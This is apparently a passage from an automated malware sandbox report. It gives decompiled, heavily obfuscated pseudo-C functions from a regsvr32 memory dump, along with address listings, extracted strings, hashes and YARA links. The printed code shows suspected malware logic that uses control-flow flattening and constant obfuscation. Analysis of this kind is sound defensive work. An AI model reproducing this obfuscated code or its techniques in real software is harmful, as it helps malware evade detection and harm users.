								E040EFECB(_t718, _v176, _v184, _v252, _v192);
								_t814 = 0x30e419;
								goto L16;
							} else {
								if(_t740 == _t798) {
									_t725 = E040D1BC9(_v260, _v28, _v300, _v124, _v20, _v188, _v244, _v156, _v24,  &_v32, _v48, _v88);
									_t834 = _t834 + 0x2c;
									__eflags = _t725 - _v292;
									_t746 = _v224;
									_t716 = 0x5dc2900;
									_t740 =  ==  ? 0x5dc2900 : 0x4160ee8;
									goto L3;
								} else {
									if(_t740 == _t814) {
										E040DF7FE(_v120, _v28, _v128, _v232);
									} else {
										if(_t740 == _t829) {
											_t729 = E040D22C9(_v308, _v36, _v32, 0x20, _a20, _v140, _v204, _v268);
											_t834 = _t834 + 0x18;
											_t740 = 0x644521d;
											__eflags = _t729 - _v196;
											_t832 =  ==  ? 1 : _t832;
											goto L11;
										} else {
											if(_t740 == 0x4160ee8) {
												E040F2B09(_v164, _v24, _v212, _v316);
												_t740 = _t814;
												goto L11;
											} else {
												if(_t740 != _t716) {
													goto L26;
												} else {
													E040ECBE9(_v216, _a12, _v56, _t746, _v104, _v44, _v116, _v32);
													_t834 = _t834 + 0x18;
													_t740 =  ==  ? _t829 : 0x644521d;
													L11:
													_t746 = _v224;
													goto L1;
												}
											}
										}
									}
								}
							}
							goto L29;
							L26:
							__eflags = _t740 - 0x1841daf;
						} while (__eflags != 0);
						goto L29;
					}
				}
			}

0x040d57c2
0x040d57c9
0x040d57cb
0x040d57d2
0x040d57d6
0x040d57dd
0x040d57e4
0x040d57eb
0x040d57f2
0x040d57f3
0x040d57f5
0x040d57fa
0x040d5805
0x040d5811
0x040d5813
0x040d581a
0x040d581f
0x040d5828
0x040d5833
0x040d583b
0x040d5843
0x040d5848
0x040d5850
0x040d5858
0x040d5865
0x040d5868
0x040d586c
0x040d5871
0x040d5879
0x040d5889
0x040d588d
0x040d589a
0x040d589d
0x040d58a1
0x040d58a9
0x040d58b9
0x040d58bd
0x040d58c2
0x040d58c7
0x040d58cf
0x040d58da
0x040d58ea
0x040d58eb
0x040d58f2
0x040d58fd
0x040d5905
0x040d590d
0x040d5912
0x040d5917
0x040d591f
0x040d592c
0x040d5936
0x040d593a
0x040d5942
0x040d594d
0x040d5958
0x040d5963
0x040d596b
0x040d5972
0x040d597a
0x040d597f
0x040d5987
0x040d599c
0x040d599d
0x040d59a4
0x040d59ac
0x040d59b7
0x040d59c5
0x040d59c9
0x040d59d3
0x040d59d7
0x040d59df
0x040d59ea
0x040d59f5
0x040d5a00
0x040d5a0b
0x040d5a13
0x040d5a1e
0x040d5a29
0x040d5a34
0x040d5a3f
0x040d5a4a
0x040d5a52
0x040d5a5a
0x040d5a62
0x040d5a67
0x040d5a6f
0x040d5a7a
0x040d5a85
0x040d5a90
0x040d5a9b
0x040d5aa6
0x040d5ab1
0x040d5abc
0x040d5ac7
0x040d5ad2
0x040d5ae5
0x040d5aec
0x040d5af7
0x040d5b02
0x040d5b12
0x040d5b19
0x040d5b24
0x040d5b2f
0x040d5b37
0x040d5b42
0x040d5b4d
0x040d5b58
0x040d5b60
0x040d5b6b
0x040d5b76
0x040d5b81
0x040d5b89
0x040d5b94
0x040d5b9f
0x040d5baa
0x040d5bb5
0x040d5bc0
0x040d5bcb
0x040d5bd6
0x040d5be1
0x040d5bec
0x040d5bf4
0x040d5bfc
0x040d5c04
0x040d5c09
0x040d5c11
0x040d5c1c
0x040d5c27
0x040d5c32
0x040d5c3d
0x040d5c4a
0x040d5c52
0x040d5c5a
0x040d5c65
0x040d5c6d
0x040d5c75
0x040d5c7d
0x040d5c85
0x040d5c8d
0x040d5c98
0x040d5ca3
0x040d5cab
0x040d5cb6
0x040d5cbe
0x040d5cc6
0x040d5cce
0x040d5cd6
0x040d5cde
0x040d5ced
0x040d5cee
0x040d5cf2
0x040d5cfa
0x040d5d02
0x040d5d0a
0x040d5d12
0x040d5d1a
0x040d5d22
0x040d5d2a
0x040d5d37
0x040d5d3b
0x040d5d40
0x040d5d45
0x040d5d4d
0x040d5d55
0x040d5d5a
0x040d5d5e
0x040d5d63
0x040d5d6b
0x040d5d73
0x040d5d78
0x040d5d85
0x040d5d89
0x040d5d91
0x040d5d99
0x040d5d9e
0x040d5da3
0x040d5da8
0x040d5db0
0x040d5db8
0x040d5dc2
0x040d5dc6
0x040d5dcb
0x040d5dd3
0x040d5dde
0x040d5de6
0x040d5df1
0x040d5dfc
0x040d5e07
0x040d5e12
0x040d5e1a
0x040d5e28
0x040d5e2c
0x040d5e34
0x040d5e3c
0x040d5e44
0x040d5e51
0x040d5e55
0x040d5e5d
0x040d5e65
0x040d5e70
0x040d5e7b
0x040d5e86
0x040d5e93
0x040d5e9e
0x040d5ea6
0x040d5eb1
0x040d5ebc
0x040d5ec4
0x040d5ecf
0x040d5ed7
0x040d5edc
0x040d5ee4
0x040d5eec
0x040d5ef4
0x040d5eff
0x040d5f09
0x040d5f0c
0x040d5f13
0x040d5f1e
0x040d5f2b
0x040d5f2f
0x040d5f37
0x040d5f3b
0x040d5f43
0x040d5f56
0x040d5f66
0x040d5f67
0x040d5f70
0x040d5f7b
0x040d5f86
0x040d5f8e
0x040d5f99
0x040d5fa4
0x040d5fac
0x040d5fb4
0x040d5fbc
0x040d5fc0
0x040d5fc8
0x040d5fde
0x040d5fe5
0x040d5ff0
0x040d5ffb
0x040d6006
0x040d6011
0x040d601c
0x040d6027
0x040d6032
0x040d603d
0x040d6045
0x040d6050
0x040d6063
0x040d6064
0x040d606b
0x040d6076
0x040d6081
0x040d608c
0x040d6097
0x040d60a4
0x040d60a8
0x040d60b0
0x040d60b5
0x040d60bd
0x040d60d0
0x040d60d7
0x040d60e2
0x040d60ed
0x040d6102
0x040d610b
0x040d6116
0x040d611b
0x040d6126
0x040d6131
0x040d613c
0x040d6147
0x040d6152
0x040d6165
0x040d6168
0x040d6173
0x040d617e
0x040d6185
0x040d6190
0x040d619b
0x040d61a6
0x040d61b1
0x040d61bc
0x040d61cf
0x040d61d6
0x040d61e1
0x040d61ec
0x040d6202
0x040d6209
0x040d6214
0x040d621f
0x040d622a
0x040d623a
0x040d623d
0x040d6244
0x040d624f
0x040d625a
0x040d6270
0x040d6277
0x040d6282
0x040d628e
0x040d6293
0x040d6299
0x040d629e
0x040d62a3
0x040d62ab
0x040d62be
0x040d62bf
0x040d62cf
0x040d62d4
0x040d62db
0x040d62e6
0x040d62f1
0x040d62fc
0x040d6307
0x040d6312
0x040d6312
0x040d6317
0x040d631c
0x040d631c
0x040d631c
0x040d631c
0x040d6322
0x00000000
0x00000000
0x040d6578
0x040d657e
0x040d66b2
0x040d66b7
0x00000000
0x040d6584
0x040d6584
0x040d658a
0x040d665a
0x040d665b
0x040d6663
0x040d6668
0x040d666f
0x040d6672
0x040d6674
0x040d667d
0x040d6682
0x040d6685
0x00000000
0x040d6590
0x040d6590
0x040d6596
0x040d6637
0x00000000
0x040d659c
0x040d659c
0x040d65a2
0x040d65a8
0x040d65b1
0x040d65b5
0x040d65fb
0x040d6600
0x040d660b
0x040d6616
0x040d662d
0x040d656e
0x040d656e
0x040d66bc
0x040d66bc
0x040d66c3
0x040d66cb
0x040d66cb
0x00000000
0x040d65a2
0x040d6596
0x040d658a
0x040d6700
0x040d670a
0x040d670a
0x040d6328
0x040d648f
0x040d6498
0x040d649f
0x040d64ad
0x040d64bc
0x040d64c3
0x040d64ca
0x040d651c
0x040d6524
0x040d6541
0x040d6546
0x040d6564
0x040d6569
0x00000000
0x040d632e
0x040d6330
0x040d6469
0x040d6470
0x040d647c
0x040d647e
0x040d6482
0x040d6487
0x00000000
0x040d6336
0x040d6338
0x040d66f7
0x040d633e
0x040d6340
0x040d63fd
0x040d640e
0x040d6411
0x040d6416
0x040d6418
0x00000000
0x040d6346
0x040d634c
0x040d63c5
0x040d63cc
0x00000000
0x040d634e
0x040d6350
0x00000000
0x040d6356
0x040d6388
0x040d638f
0x040d63a0
0x040d63a3
0x040d63a3
0x00000000
0x040d63a3
0x040d6350
0x040d634c
0x040d6340
0x040d6338
0x040d6330
0x00000000
0x040d66d0
0x040d66d0
0x040d66d0
0x00000000
0x040d66dc
0x040d6317

Strings

`, xrefs: 040D621F
2G, xrefs: 040D5905
W, xrefs: 040D5BC0
(INK, xrefs: 040D5DE6
tJP, xrefs: 040D5E3C
NI5, xrefs: 040D5FC8
Jm, xrefs: 040D5EFF
5 , xrefs: 040D5D12
W"j, xrefs: 040D6006
P_W, xrefs: 040D5D6B
{4, xrefs: 040D5CFA

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (INK$2G$5 $Jm$NI5$P_W$W"j$`$tJP${4$W
API String ID: 0-4122124823
Opcode ID: 43fc62dd7dcfd6db6e8396ed1d355363163415e8842b47937aa57dbb85103e34
Instruction ID: 25492102e6ca1cf7e6398e936957692b6db9d701c0e3a672dc1353410e287d25
Opcode Fuzzy Hash: 43fc62dd7dcfd6db6e8396ed1d355363163415e8842b47937aa57dbb85103e34
Instruction Fuzzy Hash: 8F72ED715083818FD3B9CF65C98AB8FBBE1BBC4308F108A1DE2D996260D7B19559CF42

Uniqueness

Uniqueness Score: -1.00%

Function 040DD14C, Relevance: 14.1, Strings: 11, Instructions: 385
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E040DD14C() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				void* _t429;
				intOrPtr _t432;
				intOrPtr _t436;
				signed int _t440;
				void* _t441;
				void* _t459;
				signed int _t468;
				intOrPtr _t469;
				intOrPtr* _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int* _t477;
				void* _t480;

				_t477 =  &_v1756;
				_v1600 = 0x9247ff;
				_t441 = 0xcb67425;
				_v1600 = _v1600 + 0x9ce;
				_v1600 = _v1600 ^ 0x009251e4;
				_v1720 = 0x31cc78;
				_v1720 = _v1720 ^ 0xe44f8b4e;
				_v1720 = _v1720 | 0xfbe7febf;
				_v1720 = _v1720 ^ 0xfff0ff80;
				_v1612 = 0x6730db;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0xcc36c002;
				_v1668 = 0x7fe6a4;
				_v1668 = _v1668 + 0xffff1494;
				_v1668 = _v1668 ^ 0x091c946b;
				_v1668 = _v1668 ^ 0x09626f51;
				_v1756 = 0x73e886;
				_v1756 = _v1756 | 0xafbdbbdf;
				_v1756 = _v1756 + 0xfe30;
				_v1756 = _v1756 ^ 0xb000fa0f;
				_v1604 = 0x468da6;
				_v1604 = _v1604 + 0xffffc3ca;
				_v1604 = _v1604 ^ 0x00465160;
				_v1592 = 0xd4519;
				_v1592 = _v1592 + 0x934d;
				_v1592 = _v1592 ^ 0x0004ddfc;
				_v1640 = 0x8a1a75;
				_v1640 = _v1640 + 0x87da;
				_v1640 = _v1640 + 0xaa53;
				_v1640 = _v1640 ^ 0x008e8924;
				_v1648 = 0xe80c10;
				_v1648 = _v1648 ^ 0x90af551f;
				_v1648 = _v1648 + 0x6d6d;
				_v1648 = _v1648 ^ 0x90403b69;
				_v1712 = 0x809df1;
				_v1712 = _v1712 << 2;
				_v1712 = _v1712 << 7;
				_v1576 = _v1576 & 0x00000000;
				_v1712 = _v1712 * 0x69;
				_v1712 = _v1712 ^ 0x81832f4f;
				_v1656 = 0xe952a2;
				_v1656 = _v1656 | 0x54fcc54b;
				_v1656 = _v1656 + 0xffff1739;
				_v1656 = _v1656 ^ 0x54fad21b;
				_v1700 = 0xbcdb1b;
				_v1700 = _v1700 + 0xdccd;
				_v1700 = _v1700 + 0xffffcf6f;
				_v1700 = _v1700 ^ 0x00b72c28;
				_v1628 = 0x5c7dad;
				_v1628 = _v1628 >> 5;
				_v1628 = _v1628 + 0x3d87;
				_v1628 = _v1628 ^ 0x000cf9b2;
				_v1660 = 0x2281c9;
				_v1660 = _v1660 * 0x49;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x004fb411;
				_v1568 = 0xcd133d;
				_v1568 = _v1568 * 0x4e;
				_v1568 = _v1568 ^ 0x3e7dd872;
				_v1672 = 0x86c6ca;
				_v1672 = _v1672 * 0x5f;
				_v1672 = _v1672 + 0xffff3952;
				_v1672 = _v1672 ^ 0x3200c70e;
				_v1588 = 0x24e2cc;
				_v1588 = _v1588 | 0xcf150453;
				_v1588 = _v1588 ^ 0xcf3ce5d0;
				_v1572 = 0x6249a8;
				_v1572 = _v1572 << 6;
				_v1572 = _v1572 ^ 0x189f8b0c;
				_v1596 = 0x119a44;
				_v1596 = _v1596 >> 8;
				_v1596 = _v1596 ^ 0x000b5fad;
				_v1680 = 0xd16cc2;
				_v1680 = _v1680 ^ 0x4916a611;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 ^ 0x00055714;
				_v1728 = 0x441d3d;
				_t471 = 0x35;
				_v1728 = _v1728 * 3;
				_v1728 = _v1728 << 3;
				_v1728 = _v1728 | 0x559f2c94;
				_v1728 = _v1728 ^ 0x57fdad3a;
				_v1564 = 0xb1e813;
				_v1564 = _v1564 >> 0xc;
				_v1564 = _v1564 ^ 0x0004104c;
				_v1736 = 0x70197f;
				_v1736 = _v1736 >> 0x10;
				_v1736 = _v1736 + 0xe51d;
				_v1736 = _v1736 * 0x61;
				_v1736 = _v1736 ^ 0x00557f63;
				_v1744 = 0x5ff0e3;
				_v1744 = _v1744 + 0xffff2d97;
				_v1744 = _v1744 + 0xffff9c65;
				_v1744 = _v1744 ^ 0xd07f01de;
				_v1744 = _v1744 ^ 0xd026cc62;
				_v1608 = 0x914f5e;
				_v1608 = _v1608 << 0xf;
				_v1608 = _v1608 ^ 0xa7adba7a;
				_v1664 = 0xe3376f;
				_v1664 = _v1664 >> 8;
				_v1664 = _v1664 << 4;
				_v1664 = _v1664 ^ 0x000bcae6;
				_v1616 = 0x54b2fb;
				_v1616 = _v1616 + 0xce1d;
				_v1616 = _v1616 ^ 0x005b3b7b;
				_v1644 = 0xe2ce3f;
				_v1644 = _v1644 + 0x16f2;
				_v1644 = _v1644 >> 0xd;
				_v1644 = _v1644 ^ 0x000e1e70;
				_v1752 = 0x7f4aca;
				_v1752 = _v1752 ^ 0x883f1d9d;
				_v1752 = _v1752 + 0x59a5;
				_v1752 = _v1752 | 0x80ddc91b;
				_v1752 = _v1752 ^ 0x88d3833c;
				_v1636 = 0xc2c2cf;
				_v1636 = _v1636 / _t471;
				_v1636 = _v1636 + 0xffff5d17;
				_v1636 = _v1636 ^ 0x0005a2c5;
				_v1676 = 0x4604e2;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 + 0xdac5;
				_v1676 = _v1676 ^ 0x2048b942;
				_v1652 = 0x890d36;
				_v1652 = _v1652 >> 3;
				_v1652 = _v1652 | 0xfe9d52c1;
				_v1652 = _v1652 ^ 0xfe9ab4fb;
				_v1684 = 0xd96cde;
				_v1684 = _v1684 * 0x47;
				_v1684 = _v1684 + 0xffff480a;
				_v1684 = _v1684 ^ 0x3c48c040;
				_v1624 = 0xc48732;
				_v1624 = _v1624 >> 4;
				_v1624 = _v1624 ^ 0x01665cbd;
				_v1624 = _v1624 ^ 0x016df620;
				_v1692 = 0x58f5b8;
				_v1692 = _v1692 << 4;
				_v1692 = _v1692 ^ 0x299232ca;
				_v1692 = _v1692 ^ 0x2c1b7361;
				_v1732 = 0x9987b4;
				_v1732 = _v1732 << 4;
				_v1732 = _v1732 ^ 0x14505727;
				_v1732 = _v1732 | 0xbadb6758;
				_v1732 = _v1732 ^ 0xbfd57076;
				_v1708 = 0x151e5;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 >> 0xe;
				_v1708 = _v1708 + 0xffff12c7;
				_v1708 = _v1708 ^ 0xffff0a0d;
				_v1580 = 0x15a9fb;
				_v1580 = _v1580 >> 6;
				_v1580 = _v1580 ^ 0x0004a695;
				_v1688 = 0x871746;
				_t472 = 0x34;
				_v1688 = _v1688 / _t472;
				_v1688 = _v1688 + 0xffff07ae;
				_v1688 = _v1688 ^ 0x00087c5e;
				_v1740 = 0xe3d16b;
				_v1740 = _v1740 << 7;
				_v1740 = _v1740 | 0x6cb9ee1d;
				_v1740 = _v1740 ^ 0x38143ac0;
				_v1740 = _v1740 ^ 0x45e6e926;
				_v1724 = 0xe03c47;
				_v1724 = _v1724 + 0x7497;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 + 0xffff69be;
				_v1724 = _v1724 ^ 0x2c306d9d;
				_v1748 = 0xe2efab;
				_v1748 = _v1748 | 0x110de103;
				_v1748 = _v1748 + 0x3577;
				_t473 = 0x2b;
				_t440 = _v1576;
				_v1748 = _v1748 / _t473;
				_v1748 = _v1748 ^ 0x006272f3;
				_v1716 = 0x295420;
				_v1716 = _v1716 ^ 0xaa3d2c48;
				_v1716 = _v1716 + 0xffff3248;
				_v1716 = _v1716 ^ 0xb95b2034;
				_v1716 = _v1716 ^ 0x134f16e6;
				_v1620 = 0x315b6e;
				_v1620 = _v1620 ^ 0xed866512;
				_v1620 = _v1620 ^ 0xedb02c8f;
				_v1696 = 0xb25998;
				_t476 = _v1576;
				_t468 = _v1576;
				_v1696 = _v1696 * 0xf;
				_v1696 = _v1696 << 9;
				_v1696 = _v1696 ^ 0xe675be87;
				_v1632 = 0x9ab851;
				_v1632 = _v1632 ^ 0x37be7fac;
				_v1632 = _v1632 + 0xffff726f;
				_v1632 = _v1632 ^ 0x372cadd5;
				_v1704 = 0xe98d3;
				_v1704 = _v1704 | 0xb808fc66;
				_v1704 = _v1704 ^ 0xb98541de;
				_v1704 = _v1704 | 0x92c26071;
				_v1704 = _v1704 ^ 0x93ce4092;
				_v1584 = 0x695255;
				_v1584 = _v1584 | 0x2c3ea780;
				_v1584 = _v1584 ^ 0x2c75cea7;
				while(1) {
					L1:
					while(1) {
						_t459 = 0x5c;
						do {
							while(1) {
								L3:
								_t480 = _t441 - 0xc1f8872;
								if(_t480 > 0) {
									break;
								}
								if(_t480 == 0) {
									E040D3046(_v1696, _v1632, _v1704, _t440, _v1584);
								} else {
									if(_t441 == 0x1770085) {
										_t476 = E040E7C4E(_t440, _t459, _t441, _v1644, _v1752, _v1668, _v1636, _v1676, _v1756, _v1652, _t468, _v1684, _v1604, _v1624, _t441, _v1692, _t441, _v1732, _t441, _t468, _v1708,  &_v1560, _v1580, _v1612);
										_t477 =  &(_t477[0x16]);
										__eflags = _t476;
										if(_t476 == 0) {
											goto L10;
										} else {
											_t441 = 0x650cb13;
											_v1576 = 1;
											while(1) {
												_t459 = 0x5c;
												goto L3;
											}
										}
									} else {
										if(_t441 == 0x30ba806) {
											_t469 =  *0x40f6214; // 0x0
											_t470 = _t469 + 0x23c;
											while(1) {
												__eflags =  *_t470 - _t459;
												if( *_t470 == _t459) {
													break;
												}
												_t470 = _t470 + 2;
												__eflags = _t470;
											}
											_t468 = _t470 + 2;
											_t441 = 0xd1695f5;
											continue;
										} else {
											if(_t441 == 0x650cb13) {
												E040EB257(_t440, _v1688, _v1740, _t476);
												_t441 = 0x8b9ab05;
												while(1) {
													_t459 = 0x5c;
													goto L3;
												}
											} else {
												if(_t441 != 0x8b9ab05) {
													goto L25;
												} else {
													_t352 =  &_v1748; // 0x45e6e926
													E040D3046(_v1724,  *_t352, _v1716, _t476, _v1620);
													_t477 =  &(_t477[3]);
													L10:
													_t441 = 0xc1f8872;
													while(1) {
														_t459 = 0x5c;
														goto L3;
													}
												}
											}
										}
									}
								}
								L28:
								return _v1576;
							}
							__eflags = _t441 - 0xcb67425;
							if(_t441 == 0xcb67425) {
								E040D1A34(_v1592,  &_v520, _t441, _t441, _v1640, _v1648, _v1712, _t441, _v1600, _v1656);
								_t477 =  &(_t477[8]);
								_t441 = 0xd521465;
								_t459 = 0x5c;
								goto L25;
							} else {
								__eflags = _t441 - 0xd1695f5;
								if(_t441 == 0xd1695f5) {
									_t440 = E040EE8B6(_t441, _v1608, _v1664, _t441, _v1720, _v1616);
									_t477 =  &(_t477[4]);
									__eflags = _t440;
									if(_t440 != 0) {
										_t441 = 0x1770085;
										_t459 = 0x5c;
										goto L3;
									}
								} else {
									__eflags = _t441 - 0xd521465;
									if(__eflags != 0) {
										goto L25;
									} else {
										_push(_v1568);
										_push(_v1660);
										_push(_v1628);
										_t429 = E040EE1F8(0x40d1030, _v1700, __eflags);
										E040D7078( &_v1040, __eflags);
										_t432 =  *0x40f6214; // 0x0
										_t436 =  *0x40f6214; // 0x0
										E040DF96F(_v1672, __eflags, _t436 + 0x34, _t429,  &_v1040, _v1588,  &_v1560, _t432 + 0x23c, _v1572, _v1596, _v1680,  &_v520);
										E040EFECB(_t429, _v1728, _v1564, _v1736, _v1744);
										_t477 =  &(_t477[0x10]);
										_t441 = 0x30ba806;
										goto L1;
									}
								}
							}
							goto L28;
							L25:
							__eflags = _t441 - 0x3fe9fd3;
						} while (_t441 != 0x3fe9fd3);
						goto L28;
					}
				}
			}

0x040dd14c
0x040dd156
0x040dd161
0x040dd166
0x040dd171
0x040dd17c
0x040dd184
0x040dd18c
0x040dd194
0x040dd19c
0x040dd1a7
0x040dd1af
0x040dd1ba
0x040dd1c2
0x040dd1ca
0x040dd1d2
0x040dd1da
0x040dd1e2
0x040dd1ea
0x040dd1f2
0x040dd1fa
0x040dd205
0x040dd210
0x040dd21b
0x040dd226
0x040dd231
0x040dd23c
0x040dd247
0x040dd252
0x040dd25d
0x040dd268
0x040dd270
0x040dd278
0x040dd280
0x040dd288
0x040dd290
0x040dd295
0x040dd29f
0x040dd2a7
0x040dd2ab
0x040dd2b3
0x040dd2bb
0x040dd2c3
0x040dd2cb
0x040dd2d3
0x040dd2db
0x040dd2e3
0x040dd2eb
0x040dd2f3
0x040dd2fe
0x040dd306
0x040dd311
0x040dd31c
0x040dd329
0x040dd32d
0x040dd332
0x040dd33a
0x040dd34d
0x040dd354
0x040dd35f
0x040dd36c
0x040dd370
0x040dd378
0x040dd380
0x040dd38b
0x040dd396
0x040dd3a1
0x040dd3ac
0x040dd3b4
0x040dd3bf
0x040dd3ca
0x040dd3d2
0x040dd3dd
0x040dd3e5
0x040dd3ed
0x040dd3f4
0x040dd3fc
0x040dd40b
0x040dd40c
0x040dd410
0x040dd415
0x040dd41d
0x040dd425
0x040dd430
0x040dd438
0x040dd443
0x040dd44b
0x040dd450
0x040dd45d
0x040dd461
0x040dd469
0x040dd471
0x040dd479
0x040dd481
0x040dd489
0x040dd491
0x040dd49c
0x040dd4a4
0x040dd4af
0x040dd4b7
0x040dd4bc
0x040dd4c1
0x040dd4c9
0x040dd4d4
0x040dd4df
0x040dd4ea
0x040dd4f5
0x040dd500
0x040dd508
0x040dd513
0x040dd51b
0x040dd523
0x040dd52b
0x040dd533
0x040dd53b
0x040dd54f
0x040dd556
0x040dd561
0x040dd56c
0x040dd579
0x040dd57d
0x040dd585
0x040dd58d
0x040dd595
0x040dd59a
0x040dd5a2
0x040dd5aa
0x040dd5b7
0x040dd5bb
0x040dd5c3
0x040dd5cb
0x040dd5d6
0x040dd5de
0x040dd5e9
0x040dd5f4
0x040dd5fc
0x040dd601
0x040dd609
0x040dd611
0x040dd619
0x040dd61e
0x040dd626
0x040dd62e
0x040dd636
0x040dd63e
0x040dd643
0x040dd648
0x040dd650
0x040dd65a
0x040dd665
0x040dd66d
0x040dd678
0x040dd686
0x040dd68b
0x040dd691
0x040dd699
0x040dd6a1
0x040dd6a9
0x040dd6ae
0x040dd6b6
0x040dd6be
0x040dd6c6
0x040dd6ce
0x040dd6d6
0x040dd6db
0x040dd6e3
0x040dd6eb
0x040dd6f3
0x040dd6fb
0x040dd707
0x040dd70a
0x040dd711
0x040dd715
0x040dd71d
0x040dd725
0x040dd72d
0x040dd735
0x040dd73d
0x040dd745
0x040dd750
0x040dd75b
0x040dd766
0x040dd773
0x040dd77a
0x040dd781
0x040dd785
0x040dd78a
0x040dd792
0x040dd79d
0x040dd7a8
0x040dd7b3
0x040dd7be
0x040dd7c6
0x040dd7ce
0x040dd7d6
0x040dd7de
0x040dd7e6
0x040dd7f1
0x040dd7fc
0x040dd807
0x040dd807
0x040dd80c
0x040dd80e
0x040dd80f
0x040dd80f
0x040dd80f
0x040dd80f
0x040dd811
0x00000000
0x00000000
0x040dd817
0x040dda90
0x040dd81d
0x040dd823
0x040dd90c
0x040dd90e
0x040dd911
0x040dd913
0x00000000
0x040dd919
0x040dd919
0x040dd91e
0x040dd80c
0x040dd80e
0x00000000
0x040dd80e
0x040dd80c
0x040dd825
0x040dd82b
0x040dd87a
0x040dd880
0x040dd88b
0x040dd88b
0x040dd88e
0x00000000
0x00000000
0x040dd888
0x040dd888
0x040dd888
0x040dd890
0x040dd893
0x00000000
0x040dd82d
0x040dd833
0x040dd86c
0x040dd873
0x040dd80c
0x040dd80e
0x00000000
0x040dd80e
0x040dd835
0x040dd83b
0x00000000
0x040dd841
0x040dd84d
0x040dd855
0x040dd85a
0x040dd85d
0x040dd85d
0x040dd80c
0x040dd80e
0x00000000
0x040dd80e
0x040dd80c
0x040dd83b
0x040dd833
0x040dd82b
0x040dd823
0x040dda98
0x040ddaa9
0x040ddaa9
0x040dd92e
0x040dd934
0x040dda5b
0x040dda60
0x040dda63
0x040dda6a
0x00000000
0x040dd93a
0x040dd93a
0x040dd940
0x040dda1a
0x040dda1c
0x040dda1f
0x040dda21
0x040dda23
0x040dd80e
0x00000000
0x040dd80e
0x040dd946
0x040dd946
0x040dd94c
0x00000000
0x040dd952
0x040dd952
0x040dd95e
0x040dd962
0x040dd96d
0x040dd97b
0x040dd99f
0x040dd9c8
0x040dd9d2
0x040dd9ec
0x040dd9f1
0x040dd9f4
0x00000000
0x040dd9f4
0x040dd94c
0x040dd940
0x00000000
0x040dda6b
0x040dda6b
0x040dda6b
0x00000000
0x040dda77
0x040dd80c

Strings

{;[, xrefs: 040DD4DF
Qob, xrefs: 040DD1D2
n[1, xrefs: 040DD745
G<, xrefs: 040DD6C6
&E, xrefs: 040DD84D
w5, xrefs: 040DD6FB
o7, xrefs: 040DD4AF
URi, xrefs: 040DD7E6
T), xrefs: 040DD71D
`QF, xrefs: 040DD210
mm, xrefs: 040DD278

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: T)$&E$G<$Qob$URi$`QF$mm$n[1$o7$w5${;[
API String ID: 0-1763375246
Opcode ID: b530f39939d761c7e226ac9eda2189026ad32641e5a8230c82ec81ca119c58b8
Instruction ID: c53534ce6f5df55e3cb3ed8d6cae1adf43e9a89b02730fe0396631e247374a06
Opcode Fuzzy Hash: b530f39939d761c7e226ac9eda2189026ad32641e5a8230c82ec81ca119c58b8
Instruction Fuzzy Hash: 112212714093809FD3B9CF61C94AA9FBBE1FBC1708F10891DE29A96260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040E5779, Relevance: 12.9, Strings: 10, Instructions: 430
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E040E5779(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v88;
				char _v92;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				unsigned int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				unsigned int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				void* _t410;
				void* _t455;
				void* _t464;
